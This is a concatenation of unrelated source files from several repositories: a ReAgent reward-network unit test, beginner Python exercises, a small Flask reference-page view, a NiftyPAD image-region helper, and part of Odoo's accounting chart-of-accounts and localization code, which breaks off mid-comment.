#### File: test/net_builder/test_synthetic_reward_net_builder.py
```python
import unittest
import torch
from reagent.core import types as rlt
from reagent.core.fb_checker import IS_FB_ENVIRONMENT
from reagent.core.parameters import NormalizationData, NormalizationParameters
from reagent.net_builder.synthetic_reward.single_step_synthetic_reward import (
SingleStepSyntheticReward,
)
from reagent.net_builder.unions import SyntheticRewardNetBuilder__Union
from reagent.preprocessing.identify_types import CONTINUOUS
if IS_FB_ENVIRONMENT:
from reagent.fb.prediction.synthetic_reward.single_step_synthetic_reward import (
FbParametricSingleStepSyntheticRewardPredictorWrapper as ParametricSingleStepSyntheticRewardPredictorWrapper,
)
else:
from reagent.prediction.synthetic_reward.single_step_synthetic_reward import (
ParametricSingleStepSyntheticRewardPredictorWrapper,
)
STATE_DIM = 3
ACTION_DIM = 2
BATCH_SIZE = 2
SEQ_LEN = 4
def _create_norm(dim, offset=0):
normalization_data = NormalizationData(
dense_normalization_parameters={
i: NormalizationParameters(feature_type=CONTINUOUS, mean=0.0, stddev=1.0)
for i in range(offset, dim + offset)
}
)
return normalization_data
def _create_input():
state = torch.randn(SEQ_LEN, BATCH_SIZE, STATE_DIM)
valid_step = torch.tensor([[1], [4]])
action = torch.tensor(
[
[[0, 1], [1, 0]],
[[0, 1], [1, 0]],
[[1, 0], [0, 1]],
[[0, 1], [1, 0]],
]
)
input = rlt.MemoryNetworkInput(
state=rlt.FeatureData(state),
action=action,
valid_step=valid_step,
# the rest fields will not be used
next_state=torch.tensor([]),
reward=torch.tensor([]),
step=torch.tensor([]),
not_terminal=torch.tensor([]),
time_diff=torch.tensor([]),
)
return input
class TestSyntheticRewardNetBuilder(unittest.TestCase):
def test_single_step_synthetic_reward_net_builder_discrete_actions(
self,
):
builder = SyntheticRewardNetBuilder__Union(
SingleStepSyntheticReward=SingleStepSyntheticReward()
).value
state_normalization_data = _create_norm(STATE_DIM)
discrete_action_names = ["1", "2"]
reward_net = builder.build_synthetic_reward_network(
state_normalization_data, discrete_action_names=discrete_action_names
)
input = _create_input()
output = reward_net(input).predicted_reward
assert output.shape == (BATCH_SIZE, 1)
# TO IMPLEMENT
# predictor_wrapper = builder.build_serving_module(
# reward_net,
# state_normalization_data,
# discrete_action_names=discrete_action_names,
# )
# self.assertIsInstance(
# predictor_wrapper, DiscreteSingleStepSyntheticRewardPredictorWrapper
# )
def test_single_step_synthetic_reward_net_builder_continuous_actions(
self,
):
builder = SyntheticRewardNetBuilder__Union(
SingleStepSyntheticReward=SingleStepSyntheticReward()
).value
state_normalization_data = _create_norm(STATE_DIM)
action_normalization_data = _create_norm(ACTION_DIM, offset=STATE_DIM)
reward_net = builder.build_synthetic_reward_network(
state_normalization_data,
action_normalization_data=action_normalization_data,
)
input = _create_input()
output = reward_net(input).predicted_reward
assert output.shape == (BATCH_SIZE, 1)
predictor_wrapper = builder.build_serving_module(
reward_net,
state_normalization_data,
action_normalization_data=action_normalization_data,
)
self.assertIsInstance(
predictor_wrapper, ParametricSingleStepSyntheticRewardPredictorWrapper
)
``` |
{
"source": "jjiajian/python-programming-discussion",
"score": 4
} |
#### File: python-programming-discussion/meeting_1/is_this_coding_v2.py
```python
def is_this_coding(activity):
if activity == 'Typing':
print('No! Of course not! ' + activity + ' is not Coding!')
elif activity == 'Programming' or activity == 'Coding':
print(f'Yes! {activity} is Coding!')
else:
print(f'What is that? {activity} == Coding???')
is_this_coding('Typing')
is_this_coding('Programming')
is_this_coding('Coding')
is_this_coding('Cooking')
```
#### File: python-programming-discussion/meeting_2/check_short_circuit.py
```python
def always_true(called):
print(f'always_true is called!!!')
called[0] += 1
return True
def always_false(called):
print(f'always_false is called!!!')
called[0] += 1
return False
def replace_with_func(str):
str = str.replace('T', 'always_true(called)')
str = str.replace('F', 'always_false(called)')
return str
def check_short_circuit(statement):
called = [0]
print(f'Let\'s check {statement}.')
result = eval(replace_with_func(statement))
short_circuited = 'This is short circuited' if (called[0] == 1) else 'Both functions are called'
print(f'{statement} is {result}. {short_circuited}.\n')
check_short_circuit('T or T')
check_short_circuit('T or F')
check_short_circuit('F or T')
check_short_circuit('F or F')
check_short_circuit('T and T')
check_short_circuit('T and F')
check_short_circuit('F and T')
check_short_circuit('F and F')
```
#### File: python-programming-discussion/meeting_3/insertion_sort_rewrite.py
```python
list = [21, 5, 22, 20, 12, 3, 11, 5, 13, 16]
def insertion_help(list, ele):
i = 0
if len(list) == 0:
list.insert(i, ele)
else:
while list[i] < ele:
i = i + 1
if i == len(list):
list.insert(i + 1, ele)
return list
list.insert(i, ele)
return list
def insertion_sort(list):
new_list = []
for i in range(len(list)):
new_list = insertion_help(new_list, list[i])
return new_list
print (list)
print (insertion_sort(list))
``` |
{
"source": "jjian4/reference",
"score": 2
} |
#### File: reference/reference/views.py
```python
from flask import Flask, Markup, render_template
from os import listdir, path, walk
from reference import app
import re
@app.route('/')
def reference():
commands_path = path.join(app.static_folder, 'commands')
commands = {}
for _, subdirList, _ in walk(commands_path):
# over CATEGORIES
for category in subdirList:
commands[category] = []
# over COMMANDS in category
for filename in sorted(listdir(path.join(commands_path, category))):
filestring = open(path.join(commands_path, category, filename)).read()
filecontents = re.split('\n--+ *\n', filestring, flags=re.MULTILINE)
commands[category].append((path.splitext(filename)[0], filecontents[0], filecontents[1]))
return render_template('reference.html', allFiles=commands)
@app.route('/<category>/<name>')
def command(category, name):
content = open(path.join(app.static_folder, 'commands', category, name + '.md')).read()
return render_template('command.html', name=name, documentation=content)
``` |
{
"source": "JJiao/NiftyPAD",
"score": 3
} |
#### File: niftypad/image_process/regions.py
```python
__author__ = '<NAME>'
__email__ = "<EMAIL>"
import numpy as np
import nibabel as nib
def extract_regional_values(image, parcellation, labels):
idx = labels_to_index(parcellation, labels)
regional_values = np.mean(image[idx, ], axis=0)
return regional_values
def labels_to_index(parcellation, labels):
parcellation = np.squeeze(parcellation)
idx = np.zeros(parcellation.shape, dtype='bool')
for i in range(len(labels)):
idx = np.logical_or(idx, parcellation == labels[i])
return idx
def extract_regional_values_image_file(image_file, parcellation_file):
image = nib.load(image_file)
image_data = image.get_data()
n_frames = 1
if image_data.ndim == 4:
n_frames = image_data.shape[-1]
parcellation_img = nib.load(parcellation_file)
parcellation = parcellation_img.get_data()
regions_label = np.unique(parcellation)
regions_data = np.zeros((regions_label.size, n_frames))
regions_data = np.squeeze(regions_data)
for i in range(regions_label.size):
regions_data[i] = extract_regional_values(image_data, parcellation, [regions_label[i]])
return regions_data, regions_label
``` |
{
"source": "jjiege/odoo",
"score": 2
} |
#### File: addons/account/__init__.py
```python
from . import controllers
from . import models
from . import wizard
from . import report
from odoo import api, SUPERUSER_ID
SYSCOHADA_LIST = ['BJ', 'BF', 'CM', 'CF', 'KM', 'CG', 'CI', 'GA', 'GN', 'GW', 'GQ', 'ML', 'NE', 'CD', 'SN', 'TD', 'TG']
def _auto_install_l10n(cr, registry):
#check the country of the main company (only) and eventually load some module needed in that country
env = api.Environment(cr, SUPERUSER_ID, {})
country_code = env.user.company_id.country_id.code
if country_code:
#auto install localization module(s) if available
module_list = []
if country_code in SYSCOHADA_LIST:
#countries using OHADA Chart of Accounts
module_list.append('l10n_syscohada')
elif country_code == 'GB':
module_list.append('l10n_uk')
elif country_code == 'DE':
module_list.append('l10n_de_skr03')
module_list.append('l10n_de_skr04')
elif country_code == 'CN':
module_list.append('l10n_cn_small_business')
module_list.append('l10n_cn_standard')
else:
if env['ir.module.module'].search([('name', '=', 'l10n_' + country_code.lower())]):
module_list.append('l10n_' + country_code.lower())
else:
module_list.append('l10n_generic_coa')
if country_code == 'US':
module_list.append('account_plaid')
module_list.append('l10n_us_check_printing')
if country_code == 'CA':
module_list.append('l10n_ca_check_printing')
if country_code in ['US', 'AU', 'NZ', 'CA', 'CO', 'EC', 'ES', 'FR', 'IN', 'MX', 'UK']:
module_list.append('account_yodlee')
if country_code in SYSCOHADA_LIST + [
'AT', 'BE', 'CA', 'CO', 'DE', 'EC', 'ES', 'ET', 'FR', 'GR', 'IT', 'LU', 'MX', 'NL', 'NO',
'PL', 'PT', 'RO', 'SI', 'TR', 'UK', 'VE', 'VN'
]:
module_list.append('base_vat')
if country_code == 'MX':
module_list.append('l10n_mx_edi')
# European countries will be using SEPA
europe = env.ref('base.europe', raise_if_not_found=False)
if europe:
europe_country_codes = [x.code for x in europe.country_ids]
if country_code in europe_country_codes:
module_list.append('account_sepa')
module_list.append('account_bank_statement_import_camt')
module_ids = env['ir.module.module'].search([('name', 'in', module_list), ('state', '=', 'uninstalled')])
module_ids.sudo().button_install()
```
#### File: account_lock/models/res_company.py
```python
from odoo import models, api
class ResCompany(models.Model):
_inherit = 'res.company'
@api.multi
def write(self, vals):
# fiscalyear_lock_date can't be set to a prior date
if 'fiscalyear_lock_date' in vals or 'period_lock_date' in vals:
self._check_lock_dates(vals)
return super(ResCompany, self).write(vals)
```
#### File: account/models/chart_template.py
```python
from odoo.exceptions import AccessError
from odoo import api, fields, models, _
from odoo import SUPERUSER_ID
from odoo.exceptions import UserError
from odoo.tools import pycompat
from odoo.http import request
import logging
_logger = logging.getLogger(__name__)
def migrate_set_tags_and_taxes_updatable(cr, registry, module):
''' This is a utility function used to manually set the flag noupdate to False on tags and account tax templates on localization modules
that need migration (for example in case of VAT report improvements)
'''
env = api.Environment(cr, SUPERUSER_ID, {})
xml_record_ids = env['ir.model.data'].search([
('model', 'in', ['account.tax.template', 'account.account.tag']),
('module', 'like', module)
]).ids
if xml_record_ids:
cr.execute("update ir_model_data set noupdate = 'f' where id in %s", (tuple(xml_record_ids),))
def migrate_tags_on_taxes(cr, registry):
''' This is a utility function to help migrate the tags of taxes when the localization has been modified on stable version. If
called accordingly in a post_init_hooked function, it will reset the tags set on taxes as per their equivalent template.
Note: This unusual decision has been made in order to help the improvement of VAT reports on version 9.0, to have them more flexible
and working out of the box when people are creating/using new taxes.
'''
env = api.Environment(cr, SUPERUSER_ID, {})
xml_records = env['ir.model.data'].search([
('model', '=', 'account.tax.template'),
('module', 'like', 'l10n_%')
])
tax_template_ids = [x['res_id'] for x in xml_records.sudo().read(['res_id'])]
for tax_template in env['account.tax.template'].browse(tax_template_ids):
tax_id = env['account.tax'].search([
('name', '=', tax_template.name),
('type_tax_use', '=', tax_template.type_tax_use),
('description', '=', tax_template.description)
])
tax_id.sudo().write({'tag_ids': [(6, 0, tax_template.tag_ids.ids)]})
def preserve_existing_tags_on_taxes(cr, registry, module):
''' This is a utility function used to preserve existing previous tags during upgrade of the module.'''
env = api.Environment(cr, SUPERUSER_ID, {})
xml_records = env['ir.model.data'].search([('model', '=', 'account.account.tag'), ('module', 'like', module)])
if xml_records:
cr.execute("update ir_model_data set noupdate = 't' where id in %s", [tuple(xml_records.ids)])
# ---------------------------------------------------------------
# Account Templates: Account, Tax, Tax Code and chart. + Wizard
# ---------------------------------------------------------------
class AccountAccountTemplate(models.Model):
_name = "account.account.template"
_description = 'Templates for Accounts'
_order = "code"
name = fields.Char(required=True, index=True)
currency_id = fields.Many2one('res.currency', string='Account Currency', help="Forces all moves for this account to have this secondary currency.")
code = fields.Char(size=64, required=True, index=True)
user_type_id = fields.Many2one('account.account.type', string='Type', required=True, oldname='user_type',
help="These types are defined according to your country. The type contains more information "\
"about the account and its specificities.")
reconcile = fields.Boolean(string='Allow Invoices & payments Matching', default=False,
help="Check this option if you want the user to reconcile entries in this account.")
note = fields.Text()
tax_ids = fields.Many2many('account.tax.template', 'account_account_template_tax_rel', 'account_id', 'tax_id', string='Default Taxes')
nocreate = fields.Boolean(string='Optional Create', default=False,
help="If checked, the new chart of accounts will not contain this by default.")
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template',
help="This optional field allow you to link an account template to a specific chart template that may differ from the one its root parent belongs to. This allow you "
"to define chart templates that extend another and complete it with few new accounts (You don't need to define the whole structure that is common to both several times).")
tag_ids = fields.Many2many('account.account.tag', 'account_account_template_account_tag', string='Account tag', help="Optional tags you may want to assign for custom reporting")
group_id = fields.Many2one('account.group')
@api.multi
@api.depends('name', 'code')
def name_get(self):
res = []
for record in self:
name = record.name
if record.code:
name = record.code + ' ' + name
res.append((record.id, name))
return res
class AccountChartTemplate(models.Model):
_name = "account.chart.template"
_description = "Account Chart Template"
name = fields.Char(required=True)
parent_id = fields.Many2one('account.chart.template', string='Parent Chart Template')
code_digits = fields.Integer(string='# of Digits', required=True, default=6, help="No. of Digits to use for account code")
visible = fields.Boolean(string='Can be Visible?', default=True,
help="Set this to False if you don't want this template to be used actively in the wizard that generate Chart of Accounts from "
"templates, this is useful when you want to generate accounts of this template only when loading its child template.")
currency_id = fields.Many2one('res.currency', string='Currency', required=True)
use_anglo_saxon = fields.Boolean(string="Use Anglo-Saxon accounting", default=False)
complete_tax_set = fields.Boolean(string='Complete Set of Taxes', default=True,
help="This boolean helps you to choose if you want to propose to the user to encode the sale and purchase rates or choose from list "
"of taxes. This last choice assumes that the set of tax defined on this template is complete")
account_ids = fields.One2many('account.account.template', 'chart_template_id', string='Associated Account Templates')
tax_template_ids = fields.One2many('account.tax.template', 'chart_template_id', string='Tax Template List',
help='List of all the taxes that have to be installed by the wizard')
bank_account_code_prefix = fields.Char(string='Prefix of the bank accounts', required=True, oldname="bank_account_code_char")
cash_account_code_prefix = fields.Char(string='Prefix of the main cash accounts', required=True)
transfer_account_code_prefix = fields.Char(string='Prefix of the main transfer accounts', required=True)
income_currency_exchange_account_id = fields.Many2one('account.account.template',
string="Gain Exchange Rate Account", domain=[('internal_type', '=', 'other'), ('deprecated', '=', False)])
expense_currency_exchange_account_id = fields.Many2one('account.account.template',
string="Loss Exchange Rate Account", domain=[('internal_type', '=', 'other'), ('deprecated', '=', False)])
property_account_receivable_id = fields.Many2one('account.account.template', string='Receivable Account', oldname="property_account_receivable")
property_account_payable_id = fields.Many2one('account.account.template', string='Payable Account', oldname="property_account_payable")
property_account_expense_categ_id = fields.Many2one('account.account.template', string='Category of Expense Account', oldname="property_account_expense_categ")
property_account_income_categ_id = fields.Many2one('account.account.template', string='Category of Income Account', oldname="property_account_income_categ")
property_account_expense_id = fields.Many2one('account.account.template', string='Expense Account on Product Template', oldname="property_account_expense")
property_account_income_id = fields.Many2one('account.account.template', string='Income Account on Product Template', oldname="property_account_income")
property_stock_account_input_categ_id = fields.Many2one('account.account.template', string="Input Account for Stock Valuation", oldname="property_stock_account_input_categ")
property_stock_account_output_categ_id = fields.Many2one('account.account.template', string="Output Account for Stock Valuation", oldname="property_stock_account_output_categ")
property_stock_valuation_account_id = fields.Many2one('account.account.template', string="Account Template for Stock Valuation")
@api.model
def _prepare_transfer_account_template(self):
''' Prepare values to create the transfer account that is an intermediary account used when moving money
from a liquidity account to another.
:return: A dictionary of values to create a new account.account.
'''
digits = self.code_digits
prefix = self.transfer_account_code_prefix or ''
# Flatten the hierarchy of chart templates.
chart_template = self
chart_templates = self
while chart_template.parent_id:
chart_templates += chart_template.parent_id
chart_template = chart_template.parent_id
new_code = ''
for num in range(1, 100):
new_code = str(prefix.ljust(digits - 1, '0')) + str(num)
rec = self.env['account.account.template'].search(
[('code', '=', new_code), ('chart_template_id', 'in', chart_templates.ids)], limit=1)
if not rec:
break
else:
raise UserError(_('Cannot generate an unused account code.'))
current_assets_type = self.env.ref('account.data_account_type_current_assets', raise_if_not_found=False)
return {
'name': _('Liquidity Transfer'),
'code': new_code,
'user_type_id': current_assets_type and current_assets_type.id or False,
'reconcile': True,
'chart_template_id': self.id,
}
@api.one
def try_loading_for_current_company(self):
""" Installs this chart of accounts for the current company if not chart
of accounts had been created for it yet.
"""
self.ensure_one()
# do not use `request.env` here, it can cause deadlocks
if request and request.session.uid:
current_user = self.env['res.users'].browse(request.uid)
company = current_user.company_id
else:
# fallback to company of current user, most likely __system__
# (won't work well for multi-company)
company = self.env.user.company_id
# If we don't have any chart of account on this company, install this chart of account
if not company.chart_template_id and not self.existing_accounting(company):
self.load_for_current_company(15.0, 15.0)
def load_for_current_company(self, sale_tax_rate, purchase_tax_rate):
""" Installs this chart of accounts on the current company, replacing
the existing one if it had already one defined. If some accounting entries
had already been made, this function fails instead, triggering a UserError.
Also, note that this function can only be run by someone with administration
rights.
"""
self.ensure_one()
# do not use `request.env` here, it can cause deadlocks
if request and request.session.uid:
current_user = self.env['res.users'].browse(request.uid)
company = current_user.company_id
else:
# fallback to company of current user, most likely __system__
# (won't work well for multi-company)
company = self.env.user.company_id
# Ensure everything is translated to the company's language, not the user's one.
self = self.with_context(lang=company.partner_id.lang)
if not self.env.user._is_admin():
raise AccessError(_("Only administrators can load a charf of accounts"))
existing_accounts = self.env['account.account'].search([('company_id', '=', company.id)])
if existing_accounts:
# we tolerate switching from accounting package (localization module) as long as there isn't yet any accounting
# entries created for the company.
if self.existing_accounting(company):
raise UserError(_('Could not install new chart of account as there are already accounting entries existing.'))
# delete accounting properties
prop_values = ['account.account,%s' % (account_id,) for account_id in existing_accounts.ids]
existing_journals = self.env['account.journal'].search([('company_id', '=', company.id)])
if existing_journals:
prop_values.extend(['account.journal,%s' % (journal_id,) for journal_id in existing_journals.ids])
accounting_props = self.env['ir.property'].search([('value_reference', 'in', prop_values)])
if accounting_props:
accounting_props.sudo().unlink()
# delete account, journal, tax, fiscal position and reconciliation model
models_to_delete = ['account.reconcile.model', 'account.fiscal.position', 'account.tax', 'account.move', 'account.journal']
for model in models_to_delete:
res = self.env[model].search([('company_id', '=', company.id)])
if len(res):
res.unlink()
existing_accounts.unlink()
company.write({'currency_id': self.currency_id.id,
'anglo_saxon_accounting': self.use_anglo_saxon,
'bank_account_code_prefix': self.bank_account_code_prefix,
'cash_account_code_prefix': self.cash_account_code_prefix,
'transfer_account_code_prefix': self.transfer_account_code_prefix,
'chart_template_id': self.id
})
#set the coa currency to active
self.currency_id.write({'active': True})
# When we install the CoA of first company, set the currency to price types and pricelists
if company.id == 1:
for reference in ['product.list_price', 'product.standard_price', 'product.list0']:
try:
tmp2 = self.env.ref(reference).write({'currency_id': self.currency_id.id})
except ValueError:
pass
# If the floats for sale/purchase rates have been filled, create templates from them
self._create_tax_templates_from_rates(company.id, sale_tax_rate, purchase_tax_rate)
# Install all the templates objects and generate the real objects
acc_template_ref, taxes_ref = self._install_template(company, code_digits=self.code_digits)
# Set the transfer account on the company
company.transfer_account_id = self.env['account.account'].search([('code', '=like', self.transfer_account_code_prefix + '%')])[:1]
# Create Bank journals
self._create_bank_journals(company, acc_template_ref)
# Create the current year earning account if it wasn't present in the CoA
company.get_unaffected_earnings_account()
# set the default taxes on the company
company.account_sale_tax_id = self.env['account.tax'].search([('type_tax_use', 'in', ('sale', 'all')), ('company_id', '=', company.id)], limit=1).id
company.account_purchase_tax_id = self.env['account.tax'].search([('type_tax_use', 'in', ('purchase', 'all')), ('company_id', '=', company.id)], limit=1).id
return {}
@api.model
def existing_accounting(self, company_id):
""" Returns True iff some accounting entries have already been made for
the provided company (meaning hence that its chart of accounts cannot
be changed anymore).
"""
model_to_check = ['account.move.line', 'account.invoice', 'account.payment', 'account.bank.statement']
for model in model_to_check:
if self.env[model].sudo().search([('company_id', '=', company_id.id)], limit=1):
return True
return False
def _create_tax_templates_from_rates(self, company_id, sale_tax_rate, purchase_tax_rate):
'''
This function checks if this chart template is configured as containing a full set of taxes, and if
it's not the case, it creates the templates for account.tax object accordingly to the provided sale/purchase rates.
Then it saves the new tax templates as default taxes to use for this chart template.
:param company_id: id of the company for which the wizard is running
:param sale_tax_rate: the rate to use for created sales tax
:param purchase_tax_rate: the rate to use for created purchase tax
:return: True
'''
self.ensure_one()
obj_tax_temp = self.env['account.tax.template']
all_parents = self._get_chart_parent_ids()
# create tax templates from purchase_tax_rate and sale_tax_rate fields
if not self.complete_tax_set:
ref_taxs = obj_tax_temp.search([('type_tax_use', '=', 'sale'), ('chart_template_id', 'in', all_parents)], order="sequence, id desc", limit=1)
ref_taxs.write({'amount': sale_tax_rate, 'name': _('Tax %.2f%%') % sale_tax_rate, 'description': '%.2f%%' % sale_tax_rate})
ref_taxs = obj_tax_temp.search([('type_tax_use', '=', 'purchase'), ('chart_template_id', 'in', all_parents)], order="sequence, id desc", limit=1)
ref_taxs.write({'amount': purchase_tax_rate, 'name': _('Tax %.2f%%') % purchase_tax_rate, 'description': '%.2f%%' % purchase_tax_rate})
return True
def _get_chart_parent_ids(self):
""" Returns the IDs of all ancestor charts, including the chart itself.
(inverse of child_of operator)
:return: the IDS of all ancestor charts, including the chart itself.
"""
chart_template = self
result = [chart_template.id]
while chart_template.parent_id:
chart_template = chart_template.parent_id
result.append(chart_template.id)
return result
def _create_bank_journals(self, company, acc_template_ref):
'''
This function creates bank journals and their account for each line
data returned by the function _get_default_bank_journals_data.
:param company: the company for which the wizard is running.
:param acc_template_ref: the dictionary containing the mapping between the ids of account templates and the ids
of the accounts that have been generated from them.
'''
self.ensure_one()
bank_journals = self.env['account.journal']
# Create the journals that will trigger the account.account creation
for acc in self._get_default_bank_journals_data():
bank_journals += self.env['account.journal'].create({
'name': acc['acc_name'],
'type': acc['account_type'],
'company_id': company.id,
'currency_id': acc.get('currency_id', self.env['res.currency']).id,
'sequence': 10
})
return bank_journals
def get_countries_posting_at_bank_rec(self):
""" Returns the list of the country codes of the countries for which, by default,
payments made on bank journals should be creating draft account.move objects,
which get in turn posted when their payment gets reconciled with a bank statement line.
This function is an extension hook for localization modules.
"""
return []
@api.model
def _get_default_bank_journals_data(self):
""" Returns the data needed to create the default bank journals when
installing this chart of accounts, in the form of a list of dictionaries.
The allowed keys in these dictionaries are:
- acc_name: string (mandatory)
- account_type: 'cash' or 'bank' (mandatory)
- currency_id (optional, only to be specified if != company.currency_id)
"""
return [{'acc_name': _('Cash'), 'account_type': 'cash'}, {'acc_name': _('Bank'), 'account_type': 'bank'}]
@api.multi
def open_select_template_wizard(self):
# Add action to open wizard to select between several templates
if not self.company_id.chart_template_id:
todo = self.env['ir.actions.todo']
action_rec = self.env['ir.model.data'].xmlid_to_object('account.action_wizard_multi_chart')
if action_rec:
todo.create({'action_id': action_rec.id, 'name': _('Choose Accounting Template')})
return True
@api.model
def _prepare_transfer_account_for_direct_creation(self, name, company):
""" Prepare values to create a transfer account directly, based on the
method _prepare_transfer_account_template().
This is needed when dealing with installation of payment modules
that requires the creation of their own transfer account.
:param name: The transfer account name.
:param company: The company owning this account.
:return: A dictionary of values to create a new account.account.
"""
vals = self._prepare_transfer_account_template()
digits = self.code_digits or 6
prefix = self.transfer_account_code_prefix or ''
vals.update({
'code': self.env['account.account']._search_new_account_code(company, digits, prefix),
'name': name,
'company_id': company.id,
})
del(vals['chart_template_id'])
return vals
@api.model
def generate_journals(self, acc_template_ref, company, journals_dict=None):
"""
This method is used for creating journals.
:param acc_template_ref: Account templates reference.
:param company_id: company to generate journals for.
:returns: True
"""
JournalObj = self.env['account.journal']
for vals_journal in self._prepare_all_journals(acc_template_ref, company, journals_dict=journals_dict):
journal = JournalObj.create(vals_journal)
if vals_journal['type'] == 'general' and vals_journal['code'] == _('EXCH'):
company.write({'currency_exchange_journal_id': journal.id})
if vals_journal['type'] == 'general' and vals_journal['code'] == _('CABA'):
company.write({'tax_cash_basis_journal_id': journal.id})
return True
@api.multi
def _prepare_all_journals(self, acc_template_ref, company, journals_dict=None):
def _get_default_account(journal_vals, type='debit'):
# Get the default accounts
default_account = False
if journal['type'] == 'sale':
default_account = acc_template_ref.get(self.property_account_income_categ_id.id)
elif journal['type'] == 'purchase':
default_account = acc_template_ref.get(self.property_account_expense_categ_id.id)
elif journal['type'] == 'general' and journal['code'] == _('EXCH'):
if type=='credit':
default_account = acc_template_ref.get(self.income_currency_exchange_account_id.id)
else:
default_account = acc_template_ref.get(self.expense_currency_exchange_account_id.id)
return default_account
journals = [{'name': _('Customer Invoices'), 'type': 'sale', 'code': _('INV'), 'favorite': True, 'color': 11, 'sequence': 5},
{'name': _('Vendor Bills'), 'type': 'purchase', 'code': _('BILL'), 'favorite': True, 'color': 11, 'sequence': 6},
{'name': _('Miscellaneous Operations'), 'type': 'general', 'code': _('MISC'), 'favorite': False, 'sequence': 7},
{'name': _('Exchange Difference'), 'type': 'general', 'code': _('EXCH'), 'favorite': False, 'sequence': 9},
{'name': _('Cash Basis Tax Journal'), 'type': 'general', 'code': _('CABA'), 'favorite': False, 'sequence': 10}]
if journals_dict != None:
journals.extend(journals_dict)
self.ensure_one()
journal_data = []
for journal in journals:
vals = {
'type': journal['type'],
'name': journal['name'],
'code': journal['code'],
'company_id': company.id,
'default_credit_account_id': _get_default_account(journal, 'credit'),
'default_debit_account_id': _get_default_account(journal, 'debit'),
'show_on_dashboard': journal['favorite'],
'color': journal.get('color', False),
'sequence': journal['sequence']
}
journal_data.append(vals)
return journal_data
@api.multi
def generate_properties(self, acc_template_ref, company):
"""
This method used for creating properties.
:param acc_template_ref: Mapping between ids of account templates and real accounts created from them
:param company_id: company to generate properties for.
:returns: True
"""
self.ensure_one()
PropertyObj = self.env['ir.property']
todo_list = [
('property_account_receivable_id', 'res.partner', 'account.account'),
('property_account_payable_id', 'res.partner', 'account.account'),
('property_account_expense_categ_id', 'product.category', 'account.account'),
('property_account_income_categ_id', 'product.category', 'account.account'),
('property_account_expense_id', 'product.template', 'account.account'),
('property_account_income_id', 'product.template', 'account.account'),
]
for record in todo_list:
account = getattr(self, record[0])
value = account and 'account.account,' + str(acc_template_ref[account.id]) or False
if value:
field = self.env['ir.model.fields'].search([('name', '=', record[0]), ('model', '=', record[1]), ('relation', '=', record[2])], limit=1)
vals = {
'name': record[0],
'company_id': company.id,
'fields_id': field.id,
'value': value,
}
properties = PropertyObj.search([('name', '=', record[0]), ('company_id', '=', company.id)])
if properties:
#the property exist: modify it
properties.write(vals)
else:
#create the property
PropertyObj.create(vals)
stock_properties = [
'property_stock_account_input_categ_id',
'property_stock_account_output_categ_id',
'property_stock_valuation_account_id',
]
for stock_property in stock_properties:
account = getattr(self, stock_property)
value = account and acc_template_ref[account.id] or False
if value:
company.write({stock_property: value})
return True
@api.multi
def _install_template(self, company, code_digits=None, obj_wizard=None, acc_ref=None, taxes_ref=None):
""" Recursively load the template objects and create the real objects from them.
:param company: company the wizard is running for
:param code_digits: number of digits the accounts code should have in the COA
:param obj_wizard: the current wizard for generating the COA from the templates
:param acc_ref: Mapping between ids of account templates and real accounts created from them
:param taxes_ref: Mapping between ids of tax templates and real taxes created from them
:returns: tuple with a dictionary containing
* the mapping between the account template ids and the ids of the real accounts that have been generated
from them, as first item,
* a similar dictionary for mapping the tax templates and taxes, as second item,
:rtype: tuple(dict, dict, dict)
"""
self.ensure_one()
if acc_ref is None:
acc_ref = {}
if taxes_ref is None:
taxes_ref = {}
if self.parent_id:
tmp1, tmp2 = self.parent_id._install_template(company, code_digits=code_digits, acc_ref=acc_ref, taxes_ref=taxes_ref)
acc_ref.update(tmp1)
taxes_ref.update(tmp2)
# Ensure, even if individually, that everything is translated according to the company's language.
tmp1, tmp2 = self.with_context(lang=company.partner_id.lang)._load_template(company, code_digits=code_digits, account_ref=acc_ref, taxes_ref=taxes_ref)
acc_ref.update(tmp1)
taxes_ref.update(tmp2)
return acc_ref, taxes_ref
@api.multi
def _load_template(self, company, code_digits=None, account_ref=None, taxes_ref=None):
""" Generate all the objects from the templates
:param company: company the wizard is running for
:param code_digits: number of digits the accounts code should have in the COA
:param acc_ref: Mapping between ids of account templates and real accounts created from them
:param taxes_ref: Mapping between ids of tax templates and real taxes created from them
:returns: tuple with a dictionary containing
* the mapping between the account template ids and the ids of the real accounts that have been generated
from them, as first item,
* a similar dictionary for mapping the tax templates and taxes, as second item,
:rtype: tuple(dict, dict, dict)
"""
self.ensure_one()
if account_ref is None:
account_ref = {}
if taxes_ref is None:
taxes_ref = {}
if not code_digits:
code_digits = self.code_digits
AccountTaxObj = self.env['account.tax']
# Generate taxes from templates.
generated_tax_res = self.with_context(active_test=False).tax_template_ids._generate_tax(company)
taxes_ref.update(generated_tax_res['tax_template_to_tax'])
# Generating Accounts from templates.
account_template_ref = self.generate_account(taxes_ref, account_ref, code_digits, company)
account_ref.update(account_template_ref)
# writing account values after creation of accounts
for key, value in generated_tax_res['account_dict'].items():
if value['refund_account_id'] or value['account_id'] or value['cash_basis_account_id'] or value['cash_basis_base_account_id']:
AccountTaxObj.browse(key).write({
'refund_account_id': account_ref.get(value['refund_account_id'], False),
'account_id': account_ref.get(value['account_id'], False),
'cash_basis_account_id': account_ref.get(value['cash_basis_account_id'], False),
'cash_basis_base_account_id': account_ref.get(value['cash_basis_base_account_id'], False),
})
# Create Journals - Only done for root chart template
if not self.parent_id:
self.generate_journals(account_ref, company)
# generate properties function
self.generate_properties(account_ref, company)
# Generate Fiscal Position , Fiscal Position Accounts and Fiscal Position Taxes from templates
self.generate_fiscal_position(taxes_ref, account_ref, company)
# Generate account operation template templates
self.generate_account_reconcile_model(taxes_ref, account_ref, company)
return account_ref, taxes_ref
@api.multi
def create_record_with_xmlid(self, company, template, model, vals):
return self._create_records_with_xmlid(model, [(template, vals)], company).id
def _create_records_with_xmlid(self, model, template_vals, company):
""" Create records for the given model name with the given vals, and
create xml ids based on each record's template and company id.
"""
if not template_vals:
return self.env[model]
template_model = template_vals[0][0]
template_ids = [template.id for template, vals in template_vals]
template_xmlids = template_model.browse(template_ids).get_external_id()
data_list = []
for template, vals in template_vals:
module, name = template_xmlids[template.id].split('.', 1)
xml_id = "%s.%s_%s" % (module, company.id, name)
data_list.append(dict(xml_id=xml_id, values=vals, noupdate=True))
return self.env[model]._load_records(data_list)
@api.model
def _load_records(self, data_list, update=False):
# When creating a chart template create, for the liquidity transfer account
# - an account.account.template: this allow to define account.reconcile.model.template objects refering that liquidity transfer
# account although it's not existing in any xml file
# - an entry in ir_model_data: this allow to still use the method create_record_with_xmlid() and don't make any difference between
